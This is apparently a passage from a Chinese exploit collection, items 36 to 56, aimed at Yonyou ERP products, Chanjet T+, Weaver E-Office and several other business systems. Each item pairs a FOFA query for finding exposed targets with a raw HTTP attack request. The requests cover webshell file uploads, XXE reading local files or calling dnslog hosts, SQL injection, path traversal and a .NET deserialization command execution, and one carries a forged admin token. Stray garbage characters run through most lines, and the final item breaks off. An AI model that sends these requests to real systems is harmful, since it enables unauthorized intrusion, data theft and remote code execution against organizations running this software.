POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.15 j. q; B" L* A1 f% D& _
Host: 203.25.218.166:8888
* n" y8 [1 Q6 D1 G8 j5 X/ }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info: p# W1 n5 _8 k) h3 L/ r% o' z
Accept-Encoding: gzip, deflate! u* x0 N- \- t1 n f) L
Accept: */*
. J @3 w- v. |Connection: close/ u: }: `+ y. Q- f+ T
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA3 i b9 e" G, Z8 N- ~8 a1 k
Content-Length: 190 a S) q& R+ ? d* V
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0- S6 ?1 B7 `3 `
" ~, M2 W7 [! C+ o J' b% r
--fd28cb44e829ed1c197ec3bc71748df0
; t: M# Q7 I0 T7 @) pContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"' g# U: D P1 Y
" G8 _, O; x' D<%out.println(1111*1111);%>
- w; k0 F5 N, ?- N$ t. w--fd28cb44e829ed1c197ec3bc71748df0--$ G7 d( {5 r5 r- T! A$ L
" t4 }8 S7 b+ J6 a5 ?: Z5 b9 H+ G# i
- V# V* g8 z0 v1 G- E! k36. 用友NC-Cloud soapFormat XXE
4 S6 \: g& E* N% ?( ?2 LFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"- x: I" y1 b& n4 Z! ]7 y# j7 m
POST /uapws/soapFormat.ajax HTTP/1.18 j! w9 O4 ]; w- ?/ S
Host: 192.168.40.130:8989
/ p/ P T% m) y; Y, m; {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0! Q' H6 }, n; D2 h7 n& u( \% `
Content-Length: 263& |, k) V% D2 |2 f8 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! ~/ |/ [9 [* m) ?9 sAccept-Encoding: gzip, deflate
: ]3 {8 K/ M6 ?4 p; JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* k& d' C* ]& Z \
Connection: close
2 v3 c4 Q$ X3 y* r* BContent-Type: application/x-www-form-urlencoded
, g) H% V* ^* b7 j7 fUpgrade-Insecure-Requests: 11 M; ^: Y6 q2 g- K3 `
8 d k& c X t
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a8 s6 r" |" M0 V9 i: E6 O1 r
# ^- R" M5 S. P8 t' N
$ C9 N7 a8 J4 S9 ]$ L$ m37. 用友NC-Cloud IUpdateService XXE
' l* V$ I: }8 v9 S LFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/". U/ C2 @2 `* T7 k+ c1 n
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1; w& f. `9 ~2 H: L: ]/ }
Host: 192.168.40.130:8989, M/ v3 D6 M4 y D& q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36' ]% p- \( t8 Y: B( n* ]: o
Content-Length: 421; R, x: k" `% Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 v% A& Z, K" P6 E
Accept-Encoding: gzip, deflate
8 H; c! C% d3 n CAccept-Language: zh-CN,zh;q=0.9# F0 h3 ~. V( w7 M, z' N. n
Connection: close
7 b6 M4 V# u, Y5 U* nContent-Type: text/xml;charset=UTF-8; m A. _% H3 z. Y: B
SOAPAction: urn:getResult
! J+ Z7 x) O9 {; U( L* y3 KUpgrade-Insecure-Requests: 1( U* s# K# M5 K
$ B8 O/ T! G6 I* ]
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">! }, U/ Z' ?6 ^# b/ p* w
<soapenv:Header/>0 {' x! n, c( k" e! F! d& Y) M; ]
<soapenv:Body>
9 Z3 c3 Q2 g" R! z2 u1 h<iup:getResult>5 S2 [0 b8 Q" C/ i! v' }
<!--type: string-->" V. S2 u" J( F4 F* ?: `
<iup:string><![CDATA[
- f! `$ V# ~- w6 X/ ^7 \2 G<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
, _ m* L. {" G" S<xxx/>]]></iup:string>
& J, Z6 F' |: C: J- O</iup:getResult>9 }1 D+ [7 Z% [1 G, R; D
</soapenv:Body>* m( N8 R) Y* W1 X; C. {3 A
</soapenv:Envelope>. W& P f- T, }/ E4 Z9 D8 ?- e
( }" x2 N( ^7 A) k3 n" ~
7 q2 W8 R7 |* b5 T
( D! o' X. W$ G- w38. 用友U8 Cloud smartweb2.RPC.d XXE
' G, J* ^( E' i2 C5 [' o& cFOFA:app="用友-U8-Cloud"; r1 {( d9 e K+ W
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
* b6 G' F1 ?' Q8 [1 \& B- R# aHost: 192.168.40.131:8088" X" q1 a2 B2 N7 d3 m* P" w; @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
" |. M1 `, u, G2 l- J3 jContent-Length: 260
* M0 l, S- T9 \, mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b35 j# p/ n. b- {5 v' j
Accept-Encoding: gzip, deflate
" R5 \1 }% ^) lAccept-Language: zh-CN,zh;q=0.9# m) v0 X" _4 k9 [5 n7 I" v
Connection: close2 Q c8 d9 N3 M4 T/ C( P$ l) L
Content-Type: application/x-www-form-urlencoded
) R. y- Z5 |" F
+ b2 `/ P' J% x__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
) D9 S! j; h- T
! r" v2 r2 @( a- O5 x
0 }$ o. y$ {, @- F39. 用友U8 Cloud RegisterServlet SQL注入
2 p3 ]+ y* ?0 B- n- I i3 V/ xFOFA:title="u8c"- N5 Q# E' D/ j9 |
POST /servlet/RegisterServlet HTTP/1.1+ s3 \' }. p6 V" ^
Host: 192.168.86.128:80894 j7 S2 v; @/ M& k' K" ]! E* }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% M3 h3 x( n3 P3 h/ Y
Connection: close
7 s. T( h+ k" C6 v0 VContent-Length: 851 ?6 r2 H0 r. r
Accept: */*6 S0 _( j7 c& y# B: A4 I8 A
Accept-Language: en
+ \2 L8 }; M `Content-Type: application/x-www-form-urlencoded% q/ i9 `5 m J- l+ }! M! v) d* d
X-Forwarded-For: 127.0.0.1* m3 ~' }; s" H4 ?3 Y# Y* D7 t2 ?
Accept-Encoding: gzip
K1 X3 ?2 h; e% J- q) T N3 I. ?9 ]/ i" @
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--; f1 r, T6 F1 ^1 {
E1 s% X' l1 r! ^5 P
# {1 s1 s4 N0 x0 x
40. 用友U8-Cloud XChangeServlet XXE. f6 P' O7 }9 `, N
FOFA:app="用友-U8-Cloud"# l3 P( A6 \: Y3 j Z, @
POST /service/XChangeServlet HTTP/1.18 W* _6 w/ [3 ~: _' R8 G
Host: x.x.x.x
. o+ o4 ^+ U* c; m9 W" v9 dUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 N5 X' ^/ A& z4 DContent-Type: text/xml. x2 Q8 \% }. [$ [' g, z5 e
Connection: close
& j5 ]( g+ Q2 v! x" J, M
2 D2 l2 L! B: V( w<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>% Z/ t+ ^" P7 p8 O$ M
+ G/ T2 R' P+ O& C2 Q& a- G6 p$ n3 f J1 T
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入8 e4 a5 s4 j$ E/ u5 x; {
FOFA:app="用友-U8-Cloud"
( [7 P; b9 \, d2 lGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1( A- V- p4 r$ {0 {
Host:" o% I( y# y; ]0 P H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- D9 e6 Z, y1 v8 h5 ~
Content-Type: application/json! g8 ?4 b3 u" U& B$ {0 e, a
Accept-Encoding: gzip; J) h6 y7 C! |9 V8 e
Connection: close
* K) `9 p9 J" [) D6 [4 e: Z7 M; t4 c* L
+ p6 K7 S* z+ f' {* ~; |42. 用友GRP-U8 SmartUpload01 文件上传
! g: ?! e, ~0 fFOFA:app="用友-GRP-U8". ^* w- V/ \& E: D/ N/ q
POST /u8qx/SmartUpload01.jsp HTTP/1.1
! F& \& M9 h; D0 v' LHost: x.x.x.x
* K9 @/ U" z# c( M1 W0 `7 `% x' SContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
/ e" r# ?% ~- Q9 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36$ ?( Y! [( D- O/ n' Q4 o1 o
: i" s" t$ O+ \/ y& H
PAYLOAD
7 ?; [1 g( u# c! F* h5 T( q( @9 m0 k$ H8 S2 R5 ?
! b e' j* r- V6 @( |& J
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml) x: J- k, s/ Z5 h. f; R& F. A
* }/ } q6 {- p# w' T43. 用友GRP-U8 userInfoWeb SQL注入致RCE! P! Q1 s S- u0 x
FOFA:app="用友-GRP-U8"& G- I! K$ T* [9 S: F2 L
POST /services/userInfoWeb HTTP/1.12 v+ E2 T& M* }2 y# c! C
Host: your-ip3 b2 l C, E. |: O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 J' Q! t; F0 C* F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% a3 Z! m8 R- O) W' F; Y0 {
Accept-Encoding: gzip, deflate
7 X. ~( p% _' w0 HAccept-Language: zh-CN,zh;q=0.9! P' O R! T2 u* A
Connection: close
. v- b7 p& V$ v C3 I7 B! RSOAPAction:
, \# |) b4 b8 O! yContent-Type: text/xml;charset=UTF-8
2 Z7 V# d, I& T& b/ Q- A
/ j! D! `8 {5 P/ ]* W<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
3 \; x: Y6 p0 g' I <soapenv:Header/>0 Z: q) i3 J. L- S- [" ~2 V
<soapenv:Body>$ m/ G4 G, B8 r( C/ V
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
9 _; e. S+ F; e6 Z <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>9 H/ c* }1 e8 m3 W5 d" P4 s1 q N
</ser:getUserNameById>8 U+ @, z& J; d2 N) |9 D) I
</soapenv:Body>
( m0 F9 N3 G/ G</soapenv:Envelope>4 Q7 ?7 Z& t) X2 e2 f
- x+ }0 j: O' r1 H
* a4 W( }8 d) f, s( @' F( G
44. 用友GRP-U8 bx_dj_check.jsp SQL注入) g3 ~3 g7 j7 j8 N6 h
FOFA:app="用友-GRP-U8"
; O- @ B1 r# I/ tGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1. o) X E/ ?4 r, o0 s
Host: your-ip! V3 z; K, i- M+ y; I' \6 G9 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36% I# a j; T- b* Y: j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; v M7 t ^& j1 M/ r. AAccept-Encoding: gzip, deflate2 b+ O2 s. C' F+ a) r3 ?( I8 J
Accept-Language: zh-CN,zh;q=0.9
8 N9 q8 }: W7 g5 SConnection: close% g# i; q- @9 c, Z8 [ g* T
- f1 L* q7 y1 j
' u8 ` N+ G. K9 T; ], q45. 用友GRP-U8 ufgovbank XXE4 q' O# }! g. R# r6 ^+ N6 a
FOFA:app="用友-GRP-U8"
) D2 a( y& G- W2 }# F* p8 m8 w; XPOST /ufgovbank HTTP/1.1' W$ S" b' `1 m/ d' X# O* u0 E
Host: 192.168.40.130:222% e! a @0 E# o3 z; R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
0 o5 r+ s6 |9 ^( p) I) n0 |: DConnection: close
; [2 Q3 {6 ?% Q1 E, V0 Y* u8 g+ h5 xContent-Length: 1614 Q; r$ q; }& X( t5 N9 i i: }) m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! ~% w& Z: I0 _; o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 E6 ?7 ?+ t% `4 OContent-Type: application/x-www-form-urlencoded/ ]) y. D& ]: j$ q, v1 K6 w* V! s! E
Accept-Encoding: gzip2 B! w' q. O8 Y6 u- L- x
$ t" S& b i X) _ [* WreqData=<?xml version="1.0"?>; n+ b8 X: P( ?; C! r: t
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
4 U, k W M& ~. v7 b' E' n
/ j* k8 J3 t. I, V m) o2 \6 n. n6 b- ^* j" E" j
46. 用友GRP-U8 sqcxIndex.jsp SQL注入2 t* i3 n- w$ Y/ Z: x0 s8 M9 x# k
FOFA:app="用友-GRP-U8": ^; g; K& b. e4 C
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.13 ^6 H* S7 O- f6 j0 { U
Host: your-ip4 ]( ]# [0 X1 L: M7 Y- I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36. P. V% N. [8 y O. ^, x: ?+ w7 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& x7 `7 ?* ?& \8 U1 e
Accept-Encoding: gzip, deflate( E8 ~" w% f# D$ G+ x
Accept-Language: zh-CN,zh;q=0.9
; L& A" Z3 ^, w( P% iConnection: close0 {% Y, Y: Z" i3 s) K" c& ^& \
+ [; A- o; m$ r9 Q, Z( ]; U6 j. ?& H7 I/ z
47. 用友GRP A++Cloud 政府财务云 任意文件读取" U" K, i, H3 E1 P: e4 [% r v
FOFA:body="/pf/portal/login/css/fonts/style.css"
6 X/ p% [8 C7 f& o2 gGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1# Q; h7 U+ b# a8 K: v/ `
Host: x.x.x.x
% V) Y. b, L4 oCache-Control: max-age=0+ ~8 H, |5 P3 a: r% v3 k2 \& [, s. z
Upgrade-Insecure-Requests: 1
/ a' f8 \ T3 y: F- l9 j/ [% XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 f) a7 _- P% B( P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: X+ k' _9 Q2 H2 d& UAccept-Encoding: gzip, deflate, br
$ Q* U# ?! Z( Z7 Z9 L, B x- B8 xAccept-Language: zh-CN,zh;q=0.9) v3 r/ l+ j0 \( |6 s( a
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT- I4 d2 \ Y5 r, z0 ^) M5 _
Connection: close
% q- I2 x' K' ^' y9 G
! h v7 C! K, o" W. _ Z5 T
^4 X9 { r% S* S7 ] @. W" G9 {
48. 用友U8 CRM swfupload 任意文件上传
7 e/ X7 i2 T& T; D' Z( gFOFA:title="用友U8CRM"
* y+ o, Q' X/ I4 ~% u1 `; @! a+ @6 ?POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1+ C4 k! X6 m9 ^& R9 R ~- R4 W
Host: your-ip" f. Q- n4 m: h e j6 X n: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
, a! i6 K) v K1 [* } X8 B5 I$ ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* J% c3 v! ^: n4 |. c% W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: T5 D! {) R* S$ p, H
Accept-Encoding: gzip, deflate
+ F3 W* E4 ~ y1 d1 CContent-Type: multipart/form-data;boundary=----2695209672394068716424300668555 |; C9 i! c% h2 U
------269520967239406871642430066855
* ~. i( c6 [8 ^& ^ E: ]8 ?Content-Disposition: form-data; name="file"; filename="s.php". b/ D2 u M4 b6 F! T6 v5 ]
1231' z6 D" [# s- `& [
Content-Type: application/octet-stream
2 B' A- k. d# ^6 g( T1 c------269520967239406871642430066855, D; Y& B9 }. P# ?, r% [7 |
Content-Disposition: form-data; name="upload"
h5 N1 ?! w i9 ?upload
6 V7 T7 {" e' ~( j) @------269520967239406871642430066855--/ q: [1 W: o3 q \1 I1 e
9 {% Y2 z% v, d0 C3 Z1 m; T, l' b; N6 S9 O8 J% C. _
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
% \1 r: v9 U* _2 L* u9 p# g; jFOFA:body="用友U8CRM"
2 g8 ^2 X3 ~ `
, W/ s0 T1 }0 \7 U, p; V0 `POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1/ @* e% G- d- h; n2 O
Host: x.x.x.x& K1 K- g4 I$ y& z0 b% D t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ v4 j3 G2 u( B- W& m
Content-Length: 329
7 A- H8 C1 E6 j$ H0 z- gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: Y5 C% ?( N, W$ I5 VAccept-Encoding: gzip, deflate; n+ z7 D u' O/ S1 b; Q o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ?) `( B5 l+ ~$ F! hConnection: close5 ^( q& T! p4 s5 E& R
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w& i+ O2 Y) V) I/ W
$ t, \2 N' g( L4 p# ?$ o5 _-----------------------------vvv3wdayqv3yppdxvn3w
5 h1 b7 a' m6 Z7 U- LContent-Disposition: form-data; name="file"; filename="%s.php "" U; n! i5 j3 W2 J! O3 B8 Y6 D
Content-Type: application/octet-stream! \2 h4 q+ u9 \% |
; q7 V7 _. j0 k$ n
wersqqmlumloqa/ J4 g3 U) ?" A4 m5 n% A' q2 w% S
-----------------------------vvv3wdayqv3yppdxvn3w
2 O, @- ?* @& I, ?6 J5 I. DContent-Disposition: form-data; name="upload"
! J) _3 B7 h. J* j9 ]$ p) N1 D6 k+ [; t1 B
upload
! j* p+ X8 V! e-----------------------------vvv3wdayqv3yppdxvn3w--, a2 E/ K1 h. {/ A
+ V3 ^7 j8 ]7 p3 [7 s9 {1 P5 C% y' y5 |4 t
http://x.x.x.x/tmpfile/updB3CB.tmp.php I9 C, F! r% w
# }8 D: x" G, n1 a3 w0 B/ n50. QDocs Smart School 6.4.1 filterRecords SQL注入
J7 {- T" u% ^- k4 v% kFOFA:body="close closebtnmodal"
; H9 D6 @! M2 k4 `POST /course/filterRecords/ HTTP/1.1
; t, N8 z; Z: ]1 d% M& [' sHost: x.x.x.x
; u# u+ B( q |6 _* Z0 k: YUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 Q8 i4 r# _- X2 @9 Z* u. v* xConnection: close7 t% \4 T7 b5 F! o, K5 G! C1 Z* y! R
Content-Length: 2240 Z& \0 X" U* a+ Z2 H, M: m
Accept: */*0 D' {, b, o1 n3 [# g( w# |( K
Accept-Language: en, O% w3 g0 d! Y) n+ K! `
Content-Type: application/x-www-form-urlencoded
& d, _ s. a, ^5 I- j( L1 F) ~Accept-Encoding: gzip% l/ f+ t: L* [5 P4 w8 D
& P3 \8 L1 k. H: I8 ksearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1: x1 [; ?7 K) S: U; T
' |2 V& |& s7 {, u7 \+ B# y. f- I Y, D% n- h) v0 p4 Z/ b
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% f* |7 [/ U) k8 g" f7 {" l' }
FOFA:app="云时空社会化商业ERP系统"
, R: U) ?) T$ O$ U4 ZGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
9 C6 {$ [( g$ t) W: D5 p: s% qHost: your-ip
% J/ ?; i3 m, }0 f0 | wUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36% n B" ]5 C; ^6 J) y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
2 n1 z; J2 k# j' I. R8 iAccept-Encoding: gzip, deflate
. N3 I% K; w) FAccept-Language: zh-CN,zh;q=0.99 k6 l/ n7 q0 X! c
Connection: close
$ K4 V$ K/ h) q C1 }% n6 x1 b1 R& l M) t
6 A; O( X5 T# ]
52. 泛微E-Office json_common.php sql注入
7 K+ V1 p) K# c2 B* k/ {; _FOFA:app="泛微-EOffice"
" L" N6 O Z @3 S% \& r+ G# MPOST /building/json_common.php HTTP/1.1
! Q# Y# d C' s( m# aHost: 192.168.86.128:8097& x/ C8 f/ w& b( f- R8 L. H+ ^
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, G7 L0 a; V& \* i# h+ o( X
Connection: close
C: {7 Q5 N/ k" J; g* \Content-Length: 87- L' H$ N, j3 ^: k2 v' l4 S( n
Accept: */*5 I( a# [; F. T$ G& H
Accept-Language: en
8 v: I) d, T6 b1 P1 YContent-Type: application/x-www-form-urlencoded5 a' R; Z$ I0 r! K5 Q0 y1 _. @
Accept-Encoding: gzip8 }5 @6 h% o* F* f* W3 \
2 C7 J7 k5 x T7 F) R* s' N3 P0 r5 ^tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
1 F8 R) ?( {4 ?% Z4 X
& f9 }4 X- G2 C5 r# H6 d% ]& W( K' {+ l4 C# M% {
53. 迪普 DPTech VPN Service 任意文件上传! G; k1 w! K) F* p- C7 O
FOFA:app="DPtech-SSLVPN"
; Y J' W* }! e5 f+ A/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
' u7 m7 i; u5 _
* ]2 Q! s- P' y& u& H% Y) T5 Q% `2 \" ?
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
[- u# J6 l1 B. yFOFA:app="畅捷通-TPlus"
1 j* F' B! Q' [第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
' `, X4 ^5 u$ u8 B"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"3 x+ Y6 e0 j4 p8 A8 H
- e! W$ {/ e$ ]; c$ D5 H0 F& J9 A" n- m8 H# m$ k
完整数据包
! A2 ]. x7 h) V& P7 `) s6 W3 k) tPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.14 `! ^2 |( r% M# K
Host: x.x.x.x
8 r$ j; Z/ w g5 D* h KUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F6 ?5 C: a9 M, j w- O% R
Content-Length: 593: m7 O6 S2 I- z( A7 ?
* E4 ^3 g" a( h" W/ \8 Z1 k
{! `0 T* g1 a7 v4 |6 T4 k, m0 r
"storeID":{
0 r1 _1 W- h- \+ Z, Y4 S6 q( S, L "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
# ?, C; ^* {/ R5 J! U% A* g) h "MethodName":"Start",
1 w! H; J2 H; w3 [! o) \% m "ObjectInstance":{
7 Z& R8 S+ t8 D, k/ S( n1 e "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; u6 X* a% s, A8 a- ^, v "StartInfo":{
, h% Z5 l/ |; E. F5 y "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 A' f* ]: G5 H" Z( V. e: H7 X
"FileName":"cmd",, p7 K w$ ?0 a4 E
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
# Z- I0 A( E' }* ?* k, O }" S! S# L0 m4 Z5 k
}/ W3 y9 c( w8 U. b+ ]3 k+ L8 O
}
# G% g: q0 K9 H% A% h4 R% G8 w}
: `# ]1 f e2 b! S* c, h) y7 j) O8 W. C
7 d$ o1 k# _5 _0 V
第二步,访问如下url
- k: b8 z7 O- W" k/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt' t5 _# m1 k1 i3 s; q" N* z
9 ]4 r' V% U. P, ^+ W! j9 ^+ l* h5 a% y* @/ B @$ S- p
55. 畅捷通T+ getdecallusers信息泄露/ | P6 T6 m& r) ~; |3 c2 i
FOFA:app="畅捷通-TPlus"
2 t/ y( Z4 N" h第一步,通过
" r9 y4 g0 I2 h/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
1 V0 K* \4 X0 _/ G; _第二步,利用获取到的Cookie请求
- y" K& c, K6 H* ~' a, w" m" ?/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers) V9 g* i0 M4 O$ D1 P0 x" @
+ }' U9 ^) n9 R/ E56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE% D7 ^4 U7 D; }3 k: k
FOFA: app="畅捷通-TPlus"
9 X4 n/ @/ A% C% S) g9 YPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.15 m1 z1 @* H4 e$ k& l6 U0 B
Host: x.x.x.x! Q7 n$ m; s2 y: F* f5 g. L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ O. \3 d* U0 H8 D* W7 LContent-Type: application/json
/ T7 f2 k; z/ D6 }: L* l E, Z R$ o! P8 c9 {
